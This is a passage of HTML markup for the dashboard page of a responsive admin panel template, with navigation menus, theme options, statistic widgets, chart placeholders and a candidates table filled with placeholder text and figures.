<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>AdminUX Panel - Responsive Admin Template</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta content="SRGIT" name="author" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<!-- favicon -->
<link rel="shortcut icon" href="assets/images/favicon.png">

<!-- page css -->
<link href="assets/css/default.css" rel="stylesheet" type="text/css" />
<link href="plugins/jquery-toast-plugin/dist/jquery.toast.min.css" rel="stylesheet" type="text/css">
<link href="assets/css/charts.css" rel="stylesheet" type="text/css" />

<!-- C3 charts css -->
<link href="plugins/c3/c3.min.css" rel="stylesheet" type="text/css"  />

<!--Morris Chart CSS -->
<link rel="stylesheet" type="text/css" href="plugins/morris/morris.css">
<script src="assets/js/modernizr.min.js"></script>
</head>
<body>
<!-- Preloader -->
<div class="preload-overlay preloader-it" id="preloader">
  <div class="loader loader-main">
    <div class="line line1"></div>
    <div class="line line2"></div>
    <div class="line line3"></div>
  </div>
</div>
<!-- Preloader Ends--> 
<!-- Begin page -->
<div id="wrapper"> 
  <!-- Top Bar Start -->
  <div id="page-header" class="topbar bg-blue"> 
    <!-- LOGO -->
    <div class="topbar-left"> 
      <!-- Image logo --> 
      <a href="index.html" class="logo"> <span> <img src="assets/images/logo.png" alt="" class="lg-logo"> </span> <i> <img src="assets/images/logo_sm.png" alt="" class="sm-logo"> </i> </a> </div>
    
    <!-- Button mobile view to collapse sidebar menu -->
    <div class="navbar navbar-default" role="navigation">
      <div class="container"> 
        
        <!-- Navbar-left -->
        <ul class="nav navbar-nav navbar-left nav-menu-left">
          <li>
            <button type="button" class="button-menu-mobile open-left waves-effect"> <i class="dripicons-menu"></i> </button>
          </li>
        </ul>
        
        <!-- Search box -->
        <ul class="nav navbar-nav navbar-left">
          <li class="hidden-xs">
            <form role="search" class="app-search">
              <input type="text" placeholder="Search..."
                                           class="form-control">
              <a href=""><i class="fa fa-search"></i></a>
            </form>
          </li>
        </ul>
        <!-- end Search box --> 
        
        <!-- notification bar -->
        
        <div class="notification-header">
          <ul class="nav navbar-nav navbar-right content-right">
            <li class="nav-item active">
              <button class="btn btn-link icon-header " data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><span class="fa fa-envelope-o"></span> <span class="badge-number bg-success btn-sonar"></span></button>
              <div class="dropdown-menu message-container">
                <div class="list-unstyled"> <a href="#" class="media"> <span class="message_userpic"><img class="d-flex" src="assets/images/user-header.png" alt="Generic user image"></span>
                  <div class="media-body">
                    <h6 class="mt-0 mb-1">Ashlee Adams</h6>
                    <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel.</p>
                  </div>
                  </a> <a href="#" class="media"> <span class="message_userpic"><img class="d-flex" src="assets/images/user-header.png" alt="Generic user image"></span>
                  <div class="media-body">
                    <h6 class="mt-0 mb-1">Ashlee Adams</h6>
                    <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel.</p>
                  </div>
                  </a> <a href="#" class="media"> <span class="message_userpic"><img class="d-flex" src="assets/images/user-header.png" alt="Generic user image"></span>
                  <div class="media-body">
                    <h6 class="mt-0 mb-1">Ashlee Adams</h6>
                    <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel.</p>
                  </div>
                  </a> <a href="#" class="media"> <span class="message_userpic"><img class="d-flex" src="assets/images/user-header.png" alt="Generic user image"></span>
                  <div class="media-body">
                    <h6 class="mt-0 mb-1">Ashlee Adams</h6>
                    <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel.</p>
                  </div>
                  </a> <a href="#" class="media"> <span class="message_userpic"><img class="d-flex" src="assets/images/user-header.png" alt="Generic user image"></span>
                  <div class="media-body">
                    <h6 class="mt-0 mb-1">Ashlee Adams</h6>
                    <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel.</p>
                  </div>
                  </a> <a href="#" class="media"> <span class="message_userpic"><img class="d-flex" src="assets/images/user-header.png" alt="Generic user image"></span>
                  <div class="media-body">
                    <h6 class="mt-0 mb-1">Ashlee Adams</h6>
                    <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel.</p>
                  </div>
                  </a> </div>
              </div>
            </li>
            <li class="nav-item">
              <button class="btn btn-link icon-header badgeCircle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><span class="fa fa-bell-o"></span><span class="badge-number bg-danger btn-sonar"></span></button>
              <div class="dropdown-menu message-container">
                <div class="list-unstyled">
                  <div class="media"> <span class="alert-block bg-primary"><span class="fa fa-bullhorn"></span></span>
                    <div class="media-body">
                      <p><b>Max Smith</b> updated post of <b>Astha Smith</b>. Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin.</p>
                    </div>
                  </div>
                  <div class="media"> <span class="alert-block bg-warning"><span class="fa fa-bell-o"></span></span>
                    <div class="media-body">
                      <p><b>Max Smith</b> updated post of <b>Astha Smith</b>. Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin.</p>
                    </div>
                  </div>
                  <div class="media"> <span class="alert-block bg-danger"><span class="fa fa-exclamation-triangle"></span></span>
                    <div class="media-body">
                      <p><b>Max Smith</b> updated post of <b>Astha Smith</b>. Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin.</p>
                    </div>
                  </div>
                </div>
              </div>
            </li>
            <li class="nav-item hidden-xs-down">
              <button class="btn btn-link icon-header " data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><span class="fa fa-th"></span> </button>
              <div class="dropdown-menu message-container box-links">
                <div class="list-unstyled"> <a href="" class="media"> <span class="quick-block"><span class="fa fa-bullhorn"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-bell-o"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-calendar"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-id-card"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-handshake-o"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-camera-retro"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-flask"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-plane"></span></span> </a> <a href="" class="media"> <span class="quick-block "><span class="fa fa-pie-chart"></span></span> </a> </div>
              </div>
            </li>
            <li class="nav-item  hidden-xs-down">
              <button class="btn btn-link icon-header " data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><span class="fa fa-podcast"></span></button>
            </li>
            <li class="dropdown user-box"> <a href="" class="dropdown-toggle waves-effect user-link" data-toggle="dropdown" aria-expanded="false"> <img src="assets/images/users/avatar-1.jpg" alt="user-img" class="img-circle user-img"> </a>
              <ul class="dropdown-menu dropdown-menu-right arrow-dropdown-menu arrow-menu-right user-list notify-list">
                <li><a href="javascript:void(0)">Profile</a></li>
                <li><a href="javascript:void(0)"><span class="badge badge-info pull-right">4</span>Settings</a></li>
                <li><a href="javascript:void(0)">Lock screen</a></li>
                <li class="divider"></li>
                <li><a href="javascript:void(0)">Logout</a></li>
              </ul>
            </li>
          </ul>
        </div>
      </div>
      <!-- end container --> 
    </div>
    <!-- end navbar --> 
  </div>
  
  <!-- ========== Left Sidebar Start ========== -->
  <div  id="page-sidebar"  class="left side-menu">
    <div class="slimscroll-menu" id="remove-scroll">
      <div class="left-user-details">
        <div class="col-xs-4">
          <p>14/246 <span>Message</span></p>
        </div>
        <div class="col-xs-4 no-padding">
          <div class="left-img-container gradient"><img src="assets/images/user-header.png" alt="User" class="img-responsive-2"/></div>
        </div>
        <div class="col-xs-4">
          <p>$549.44 <span>Balance</span></p>
        </div>
        <div class="clearfix"></div>
      </div>
      <!-- Sidemenu -->
      <div id="sidebar-menu"> 
        <!-- Left Menu Start -->
        <ul class="metisMenu nav" id="side-menu">
          <li class="menu-title">Menu</li>
          <li> <a href="index.html"  aria-expanded="true"><i class="fi-air-play"></i> <span> Dashboard</span> </a> </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-target"></i> <span> Admin UI </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="admin-grid.html">Grid system</a></li>
              <li><a href="admin-sweet-alert.html" class="active">Sweet Alert</a></li>
              <li><a href="admin-rangeslider.html">Range Slider</a></li>
              <li><a href="admin-filemanager.html">File Manager</a></li>
              <li><a href="admin-lightbox.html">Lightbox</a></li>
              <li><a href="admin-scrollbar.html">Scroll bar</a></li>
              <li><a href="admin-slider.html">Slider</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-briefcase"></i> <span> UI Kit </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="ui-bootstrap.html">Bootstrap UI</a></li>
              <li><a href="ui-typography.html">Typography</a></li>
              <li><a href="ui-panels.html">Panels</a></li>
              <li><a href="ui-buttons.html">Buttons</a></li>
              <li><a href="ui-modals.html">Modals</a></li>
              <li><a href="ui-checkbox-radio.html">Checkboxs-Radios</a></li>
              <li><a href="ui-spinners.html">Spinners</a></li>
              <li><a href="ui-ribbons.html">Ribbons</a></li>
              <li><a href="ui-portlets.html">Portlets</a></li>
              <li><a href="ui-tabs.html">Tabs</a></li>
              <li><a href="ui-progressbars.html">Progress Bars</a></li>
              <li><a href="ui-notifications.html">Notification</a></li>
              <li><a href="ui-carousel.html">Carousel</a>
              <li><a href="ui-video.html">Video</a>
              <li><a href="ui-tooltips-popovers.html">Tooltips & Popovers</a></li>
              <li><a href="ui-images.html">Images</a></li>
              <li><a href="ui-calendar.html">Calendar</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-box"></i><span> Icons </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="icons-colored.html">Colored Icons</a></li>
              <li><a href="icons-materialdesign.html">Material Design</a></li>
              <li><a href="icons-dripicons.html">Dripicons</a></li>
              <li><a href="icons-fontawesome.html">Font awesome</a></li>
              <li><a href="icons-feather.html">Feather Icons</a></li>
              <li><a href="icons-simple-line.html">Simple line Icons</a></li>
              <li><a href="icons-flags.html">Flag Icons</a></li>
              <li><a href="icons-file.html">File Icons</a></li>
              <li><a href="icons-pe7.html">PE7 Icons</a></li>
              <li><a href="icons-typicons.html">Typicons</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-bar-graph-2"></i><span> Graphs </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="chart-flot.html">Flot Chart</a></li>
              <li><a href="chart-morris.html">Morris Chart</a></li>
              <li><a href="chart-google.html">Google Chart</a></li>
              <li><a href="chart-echart.html">Echarts</a></li>
              <li><a href="chart-chartjs.html">Chartjs Chart</a></li>
              <li><a href="chart-c3.html">C3 Chart</a></li>
              <li><a href="chart-justgage.html">Justgage Charts</a></li>
              <li><a href="chart-sparkline.html">Sparkline Chart</a></li>
              <li><a href="chart-knob.html">Jquery Knob</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-mail"></i><span> Email </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="email-inbox.html">Inbox</a></li>
              <li><a href="email-read.html">Read Email</a></li>
              <li><a href="email-compose.html">Compose Email</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-disc"></i><span class="badge badge-warning pull-right">12</span> <span> Forms </span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="form-elements.html">Form Elements</a></li>
              <li><a href="form-advanced.html">Form Advanced</a></li>
              <li><a href="form-layouts.html">Form Layouts</a></li>
              <li><a href="form-validation.html">Form Validation</a></li>
              <li><a href="form-pickers.html">Form Pickers</a></li>
              <li><a href="form-wizard.html">Form Wizard</a></li>
              <li><a href="form-mask.html">Form Masks</a></li>
              <li><a href="form-summernote.html">Summernote</a></li>
              
              <li><a href="form-typeahead.html">Typeahead</a></li>
              <li><a href="form-x-editable.html">X Editable</a></li>
              <li><a href="form-uploads.html">Multiple File Upload</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-layout"></i> <span> Tables </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="tables-basic.html">Basic Tables</a></li>
              <li><a href="tables-layouts.html">Tables Layouts</a></li>
              <li><a href="tables-datatable.html">Data Tables</a></li>
              
              <li><a href="tables-responsive.html">Responsive Table</a></li>
              <li><a href="tables-tablesaw.html">Tablesaw Tables</a></li>
              
            </ul>
          </li>
          <li class="menu-title">More</li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-map"></i> <span> Maps </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="maps-google.html">Google Maps</a></li>
              <li><a href="maps-google-full.html">Full Google Map</a></li>
              <li><a href="maps-vector.html">Vector Maps</a></li>
              <li><a href="maps-mapael.html">Mapael Maps</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-paper-stack"></i><span> Pages </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              
              <li><a href="page-login.html">Login</a></li>
              <li><a href="page-register.html">Register</a></li>
              <li><a href="taskboard-todo.html">Taskboard & To-do</a></li>
              <li><a href="page-logout.html">Logout</a></li>
              <li><a href="page-recoverpw.html">Recover Password</a></li>
              <li><a href="page-lock-screen.html">Lock Screen</a></li>
              <li><a href="page-confirm-mail.html">Confirm Mail</a></li>
              <li><a href="page-404.html">Error 404</a></li>
              <li><a href="page-404-alt.html">Error 404-alt</a></li>
              <li><a href="page-500.html">Error 500</a></li>
            </ul>
          </li>
          <li class="has_sub"> <a href="javascript:void(0);"><i class="fi-marquee-plus"></i><span> Extra Pages </span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="extras-about.html">About Us</a></li>
              <li><a href="extras-contact.html">Contact</a></li>
              <li><a href="extras-members.html">Members</a></li>
              <li><a href="extras-timeline.html">Timeline</a></li>
              <li><a href="extras-invoice.html">Invoice</a></li>
              <li><a href="extras-maintenance.html">Maintenance</a></li>
              <li><a href="extras-coming-soon.html">Coming Soon</a></li>
              <li><a href="extras-faq.html">FAQ</a></li>
              <li><a href="extras-pricing.html">Pricing</a></li>
              <li><a href="extras-profile.html">Profile</a></li>
              <li><a href="extras-email-template.html">Email Templates</a></li>
            </ul>
          </li>
          <li> <a href="javascript: void(0);" aria-expanded="true"><i class="fi-share"></i> <span>Multi Level</span> <span class="menu-arrow"></span></a>
            <ul class="nav-second-level nav" aria-expanded="true">
              <li><a href="javascript: void(0);">Level 1.1</a></li>
              <li><a href="javascript: void(0);" aria-expanded="true">Level 1.2 <span class="menu-arrow"></span></a>
                <ul class="nav-third-level nav" aria-expanded="true">
                  <li><a href="javascript: void(0);">Level 2.1</a></li>
                  <li><a href="javascript: void(0);">Level 2.2</a></li>
                </ul>
              </li>
            </ul>
          </li>
        </ul>
      </div>
      <!-- Sidebar -->
      <div class="clearfix"></div>
    </div>
    <!-- Sidebar -left --> 
    
  </div>
  <!-- Left Sidebar End --> 
  
  <!-- ============================================================== --> 
  <!-- Start right Content here --> 
  <!-- ============================================================== -->
  <div class="content-page"> 
    <!-- Start content --> 
    <!-- content -->
    <div class="content">
      <div class="container">
        <div id="page-title">
          <div id="theme-options" class="admin-options"> <a href="javascript:void(0);" class="btn btn-primary theme-switcher tooltip-button" data-placement="left" title="" data-original-title="Color schemes and layout options"><i class="fa fa-cog icon-spin"></i> </a>
            <div id="theme-switcher-wrapper">
              <div class="slimScrollDiv">
                <div class="scroll-switcher">
                  <h5 class="header"> Header Style <a class="set-adminheader-style" data-header-bg="bg-blue" title="Remove all styles" href="javascript:void(0);">Clear</a> </h5>
                  <div class="theme-color-wrapper clearfix">
                    <h5>Solids</h5>
                    <a class="tooltip-button set-adminheader-style bg-primary" data-header-bg="bg-primary font-inverse" title="" href="javascript:void(0);" data-original-title="Primary">Primary</a> <a class="tooltip-button set-adminheader-style bg-green" data-header-bg="bg-green font-inverse" title="" href="javascript:void(0);" data-original-title="Green">Green</a> <a class="tooltip-button set-adminheader-style bg-red" data-header-bg="bg-red font-inverse" title="" href="javascript:void(0);" data-original-title="Red">Red</a> <a class="tooltip-button set-adminheader-style bg-blue" data-header-bg="bg-blue font-inverse" title="" href="javascript:void(0);" data-original-title="Blue">Blue</a> <a class="tooltip-button set-adminheader-style bg-warning" data-header-bg="bg-warning font-inverse" title="" href="javascript:void(0);" data-original-title="Warning">Warning</a> <a class="tooltip-button set-adminheader-style bg-purple" data-header-bg="bg-purple font-inverse" title="" href="javascript:void(0);" data-original-title="Purple">Purple</a> <a class="tooltip-button set-adminheader-style bg-black" data-header-bg="bg-black font-inverse" title="" href="javascript:void(0);" data-original-title="Black">Black</a>
                    <div class="clear"></div>
                    <h5 class="mrg15T">Gradients</h5>
                    <a class="tooltip-button set-adminheader-style bg-gradient-1" data-header-bg="bg-gradient-1 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 1">Gradient 1</a> <a class="tooltip-button set-adminheader-style bg-gradient-2" data-header-bg="bg-gradient-2 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 2">Gradient 2</a> <a class="tooltip-button set-adminheader-style bg-gradient-3" data-header-bg="bg-gradient-3 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 3">Gradient 3</a> <a class="tooltip-button set-adminheader-style bg-gradient-4" data-header-bg="bg-gradient-4 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 4">Gradient 4</a> <a class="tooltip-button set-adminheader-style bg-gradient-5" data-header-bg="bg-gradient-5 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 5">Gradient 5</a> <a class="tooltip-button set-adminheader-style bg-gradient-6" data-header-bg="bg-gradient-6 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 6">Gradient 6</a> <a class="tooltip-button set-adminheader-style bg-gradient-7" data-header-bg="bg-gradient-7 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 7">Gradient 7</a> <a class="tooltip-button set-adminheader-style bg-gradient-8 active" data-header-bg="bg-gradient-8 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 8">Gradient 8</a> </div>
                  <h5 class="header"> Sidebar Style <a class="set-sidebar-style" data-header-bg="" title="Remove all styles" href="javascript:void(0);">Clear</a> </h5>
                  <div class="theme-color-wrapper clearfix">
                    <h5>Solids</h5>
                    <a class="tooltip-button set-sidebar-style bg-primary" data-header-bg="bg-primary font-inverse" title="" href="javascript:void(0);" data-original-title="Primary">Primary</a> <a class="tooltip-button set-sidebar-style bg-green" data-header-bg="bg-green font-inverse" title="" href="javascript:void(0);" data-original-title="Green">Green</a> <a class="tooltip-button set-sidebar-style bg-red" data-header-bg="bg-red font-inverse" title="" href="javascript:void(0);" data-original-title="Red">Red</a> <a class="tooltip-button set-sidebar-style bg-blue" data-header-bg="bg-blue font-inverse" title="" href="javascript:void(0);" data-original-title="Blue">Blue</a> <a class="tooltip-button set-sidebar-style bg-warning" data-header-bg="bg-warning font-inverse" title="" href="javascript:void(0);" data-original-title="Warning">Warning</a> <a class="tooltip-button set-sidebar-style bg-purple" data-header-bg="bg-purple font-inverse" title="" href="javascript:void(0);" data-original-title="Purple">Purple</a> <a class="tooltip-button set-sidebar-style bg-black" data-header-bg="bg-black font-inverse" title="" href="javascript:void(0);" data-original-title="Black">Black</a>
                    <div class="clear"></div>
                    <h5 class="mrg15T">Gradients</h5>
                    <a class="tooltip-button set-sidebar-style bg-gradient-1" data-header-bg="bg-gradient-1 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 1">Gradient 1</a> <a class="tooltip-button set-sidebar-style bg-gradient-2" data-header-bg="bg-gradient-2 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 2">Gradient 2</a> <a class="tooltip-button set-sidebar-style bg-gradient-3" data-header-bg="bg-gradient-3 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 3">Gradient 3</a> <a class="tooltip-button set-sidebar-style bg-gradient-4" data-header-bg="bg-gradient-4 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 4">Gradient 4</a> <a class="tooltip-button set-sidebar-style bg-gradient-5" data-header-bg="bg-gradient-5 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 5">Gradient 5</a> <a class="tooltip-button set-sidebar-style bg-gradient-6" data-header-bg="bg-gradient-6 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 6">Gradient 6</a> <a class="tooltip-button set-sidebar-style bg-gradient-7" data-header-bg="bg-gradient-7 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 7">Gradient 7</a> <a class="tooltip-button set-sidebar-style bg-gradient-8" data-header-bg="bg-gradient-8 font-inverse" title="" href="javascript:void(0);" data-original-title="Gradient 8">Gradient 8</a> </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        
        <!-- breadcrumbs -->
        <div class="col-xs-12">
          <div class="page-title-box">
            <h4 class="page-title">Dashboard</h4>
            <p>The most complete user interface framework that can be used to create stunning admin dashboard and presentation websites.</p>
            <div class="clearfix"></div>
          </div>
        </div>
        <div class="clearfix"></div>
        <!-- breadcrumbs --> 
        
        <!-- end row -->
        
        <div class="col-lg-3 col-md-6">
          <div class="card-box widget-box-two widget-two-custom box-one">
            <div class="wigdet-two-content">
              <h2 class=""><span data-plugin="counterup">65841</span> <span><i class="mdi mdi-arrow-up"></i></span> </h2>
              <p class="m-0 text-uppercase font-secondary text-overflow" title="Statistics">Total Profit</p>
              <p class="m-0">Jan - Apr 2017</p>
            </div>
            <i class="mdi icon-chart widget-two-icon"></i> </div>
        </div>
        <!-- end col -->
        
        <div class="col-lg-3 col-md-6">
          <div class="card-box widget-box-two widget-two-custom box-two">
            <div class="wigdet-two-content">
              <h2 class=""><span data-plugin="counterup">236521</span> <span><i class="mdi mdi-arrow-up"></i></span> </h2>
              <p class="m-0 text-uppercase font-secondary text-overflow" title="Statistics">Active Users</p>
              <p class="m-0 text-uppercase ">MONTHLY Progress</p>
            </div>
            <i class="mdi  icon-people widget-two-icon"></i> </div>
        </div>
        <!-- end col -->
        
        <div class="col-lg-3 col-md-6">
          <div class="card-box widget-box-two widget-two-custom box-three">
            <div class="wigdet-two-content">
              <h2 class=""> <span data-plugin="counterup">563698</span> <span><i class="mdi mdi-arrow-up"></i></span></h2>
              <p class="m-0 text-uppercase font-secondary text-overflow" title="Statistics">New orders</p>
              <p class="m-0 text-uppercase ">MONTHLY Progress</p>
            </div>
            <i class="mdi  icon-book-open widget-two-icon"></i> </div>
        </div>
        <!-- end col -->
        
        <div class="col-lg-3 col-md-6">
          <div class="card-box widget-box-two widget-two-custom box-four">
            <div class="wigdet-two-content">
              <h2 class=""><span data-plugin="counterup">2.07</span>% <span><i class="mdi mdi-arrow-up"></i></span> </h2>
              <p class="m-0 text-uppercase font-secondary text-overflow" title="Statistics">New comments</p>
              <p class="m-0 text-uppercase ">MONTHLY Progress</p>
            </div>
            <i class="mdi icon-bubbles widget-two-icon"></i> </div>
        </div>
        <!-- end col -->
        <div class="clearfix"></div>
        <!-- end row -->
        
        <div class="col-lg-4">
          <div class="card-box">
            <h4 class="header-title m-t-0 m-b-30">Revenue Comparison</h4>
            <div class="text-center">
              <h5 class="font-normal text-muted">You have to pay</h5>
              <h3 class="m-b-30"><i class="mdi mdi-arrow-up-bold-hexagon-outline text-success"></i> 25643 <small>USD</small></h3>
            </div>
            <div class="chart-container">
              <div class="chart-2-main" id="platform_type_dates_donut"></div>
            </div>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="card-box">
            <h4 class="header-title m-t-0 m-b-30">Visitors Overview</h4>
            <div class="text-center">
              <h5 class="font-normal text-muted">You have to pay</h5>
              <h3 class="m-b-30"><i class="mdi mdi-arrow-down-bold-hexagon-outline text-danger"></i> 5623 <small>USD</small></h3>
            </div>
            <div class="chart-container">
              <div class="chart-2-main" id="user_type_bar"></div>
            </div>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="card-box">
            <h4 class="header-title m-t-0 m-b-30">Goal Completion</h4>
            <div class="text-center">
              <h5 class="font-normal text-muted">You have to pay</h5>
              <h3 class="m-b-30"><i class="mdi mdi-arrow-up-bold-hexagon-outline text-success"></i> 2548 <small>USD</small></h3>
            </div>
            <div class="chart-container">
              <div class="chart has-fixed-height chart-2-main" id="page_views_today"></div>
            </div>
          </div>
        </div>
        
        <!-- end row -->
        
        <div class="col-lg-8 p-r-10 p-l-10">
          <div class="row row-2">
            <div class="col-sm-4">
              <div class="card-box widget-box-four">
                <div id="dashboard-1" class="widget-box-four-chart"></div>
                <div class="wigdet-four-content pull-left">
                  <h4 class="m-t-0 font-16 m-b-5 text-overflow" title="Total Revenue">Total Revenue</h4>
                  <p class="font-secondary text-muted">Jan - Apr 2017</p>
                  <h3 class="m-b-0 m-t-20"><span>$</span> <span data-plugin="counterup">5,2548</span></h3>
                </div>
                <div class="clearfix"></div>
              </div>
            </div>
            <!-- end col -->
            
            <div class="col-sm-4">
              <div class="card-box widget-box-four">
                <div id="dashboard-2" class="widget-box-four-chart"></div>
                <div class="wigdet-four-content pull-left">
                  <h4 class="m-t-0 font-16 m-b-5 text-overflow" title="Total Unique Visitors">Total Unique Visitors</h4>
                  <p class="font-secondary text-muted">Jan - Apr 2017</p>
                  <h3 class="m-b-0 m-t-20"><span>$</span> <span data-plugin="counterup">65,241</span></h3>
                </div>
                <div class="clearfix"></div>
              </div>
            </div>
            <!-- end col -->
            
            <div class="col-sm-4">
              <div class="card-box widget-box-four">
                <div id="dashboard-3" class="widget-box-four-chart"></div>
                <div class="wigdet-four-content pull-left">
                  <h4 class="m-t-0 font-16 m-b-5 text-overflow" title="Number of Transactions">Number of Transactions</h4>
                  <p class="font-secondary text-muted">Jan - Apr 2017</p>
                  <h3 class="m-b-0 m-t-20"><span>$</span> <span data-plugin="counterup">28,5960</span></h3>
                </div>
                <div class="clearfix"></div>
              </div>
            </div>
            <!-- end col --> 
            
          </div>
          <!-- end row -->
          
          <div class="row row-2">
            <div class="col-sm-12">
              <div class="card-box">
                <h4 class="header-title m-t-0">Stacked Bar Chart</h4>
                <div class="text-center">
                  <div class="row">
                    <div class="col-xs-4">
                      <div class="m-t-20 m-b-20">
                        <h4 class="m-b-10">2563</h4>
                        <p class="text-uppercase m-b-5 font-13 font-600">Lifetime Sales</p>
                      </div>
                    </div>
                    <div class="col-xs-4">
                      <div class="m-t-20 m-b-20">
                        <h4 class="m-b-10">6952</h4>
                        <p class="text-uppercase m-b-5 font-13 font-600">Income</p>
                      </div>
                    </div>
                    <div class="col-xs-4">
                      <div class="m-t-20 m-b-20">
                        <h4 class="m-b-10">1125</h4>
                        <p class="text-uppercase m-b-5 font-13 font-600">Visits</p>
                      </div>
                    </div>
                  </div>
                </div>
                <div id="morris-bar-stacked" class="h-349"></div>
              </div>
            </div>
            <!-- end col --> 
            
          </div>
          <!-- end row --> 
          
        </div>
        <!-- end col -->
        
        <div class="col-lg-4">
          <div class="card-box text-center">
            <div class="text-center">
              <h5 class="font-normal text-muted">Lifetime Sales</h5>
              <h3 class="m-b-30"><i class="mdi mdi-arrow-up-bold-hexagon-outline text-success"></i> 48948 <small>USD</small></h3>
            </div>
            <div id="morris-line-example" class="h-180"></div>
          </div>
          <div class="card-box notification-box">
            <h4 class="header-title m-t-0 m-b-15">Recent Notifications</h4>
            <div class="m-b-15">
              <p><span class="pull-right text-dark">Mark Loyerdn</span> <span class="label label-primary">Visitor</span></p>
              <p class="font-13 m-b-3">Praesent libero. Nunc nec dui vitae urna cursus lacinia. In venenatis eget justo in dictum. Vestibulum auctor raesent quisnm.</p>
              <p class="font-13"><i>2 Min ago</i></p>
            </div>
            <div class="">
              <p><span class="pull-right text-dark">Mark Loyerdn</span> <span class="label label-success">Seller</span></p>
              <p class="font-13 m-b-3">Praesent libero. Nunc nec dui vitae urna cursus lacinia. In venenatis eget justo in dictum. Vestibulum auctor raesent quisnm.</p>
              <p class="font-13 m-b-0"><i>5 Hours ago</i></p>
            </div>
          </div>
        </div>
        <!-- end col -->
        
        <div class="col-lg-6">
          <div class="card-box">
            <h4 class="m-t-0 header-title"><b>Recent Candidates</b></h4>
            <p class="text-muted font-14 m-b-0"> Your text goes here. </p>
            <div class="table-responsive">
              <table class="table table-hover m-0 mails table-actions-bar">
                <thead>
                  <tr>
                    <th> <div class="btn-group dropdown">
                        <button type="button" class="btn btn-default btn-xs dropdown-toggle waves-effect waves-light" data-toggle="dropdown" aria-expanded="false"><i class="caret"></i></button>
                        <ul class="dropdown-menu" role="menu">
                          <li><a href="#">Action</a></li>
                          <li><a href="#">Another action</a></li>
                          <li><a href="#">Something else here</a></li>
                          <li class="divider"></li>
                          <li><a href="#">Separated link</a></li>
                        </ul>
                      </div>
                    </th>
                    <th>Name</th>
                    <th>Location</th>
                    <th>Job Timing</th>
                    <th>Salary</th>
                    <th>Action</th>
                  </tr>
                </thead>
                <tbody>
                  <tr>
                    <td><img src="assets/images/users/avatar-2.jpg" alt="contact-img" title="contact-img" class="img-circle thumb-sm" /></td>
                    <td><h5 class="m-b-0 m-t-0">Tomaslau</h5>
                      <p class="m-b-0"><small>Web Designer</small></p></td>
                    <td><i class="mdi mdi-map-marker text-primary"></i> New York </td>
                    <td><i class="mdi mdi-clock text-success"></i> Full Time </td>
                    <td><i class="mdi mdi-currency-usd text-warning"></i> 3265 </td>
